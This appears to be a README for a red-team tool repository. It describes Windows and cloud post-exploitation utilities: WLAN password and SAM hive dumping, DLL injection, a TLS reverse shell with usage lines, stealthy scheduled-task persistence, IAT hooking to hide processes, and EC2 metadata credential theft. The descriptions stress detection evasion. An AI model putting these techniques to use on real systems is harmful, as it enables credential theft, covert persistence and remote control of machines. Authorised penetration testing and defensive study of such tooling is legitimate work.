Should only be used for systems that you have explicit permission to target, I take no responsibility for actions performed using any code from this repository.
Use at your own risk!
Retrieve WLAN passwords from Windows. Uses native calls in Win32 API rather than executing netsh wlan ...
as a command, this approach is more stealthy!
Injects a DLL into a remote process uses the classic on disk / LoadLibrary
approach so should be used primarily for testing as it is not opsec safe.
Usage:
inject_x64.exe <dll_path> <pid>
Simple reverse shell implementation client supports comms over TLS using the tlsserver.go
server code.
Certificate is embedded into the compiled binary, update to a newly created cert.
client -tls -port 4444 <host>
tlsserver -port 4444 <cert> <key>
Simple TCP proxy
proxy <port> <host:port>
A PoC to test adding a scheduled task into windows via COM/OLE rather than the noisey approach of using schtasks.exe
. Please adjust to your needs!
Uses IAT hooking to hook into the low level NtQuerySystemInformation
function import from ntdll.dll
and hide processes based on an image name. Also includes a test executable to test against. Simply inject the DLL into the process you want to hide processes from.
Also demonstrates being able to read the PE including the IAT entries in-memory.
Code could be adjusted to perform other tasks.
Find yourself on an EC2 instance with an assigned role?! This will use the IMDS to retrieve the temporary creds. Useful if the EC2 host is locked down making it tricky to call the service using other methods and also supports working against IMDSv2 that requires a token.
Compiles to an exe however the code could be changed and compiled as a DLL to be used in-memory to be more stealty or when app blocking is in place.
Dumps the SAM & SYSTEM registry hives using Win32 API calls to allow offline cracking of the password hashes. More stealthy than using the reg commands or a well known program.
Usage:
samdump_x64.exe <dir>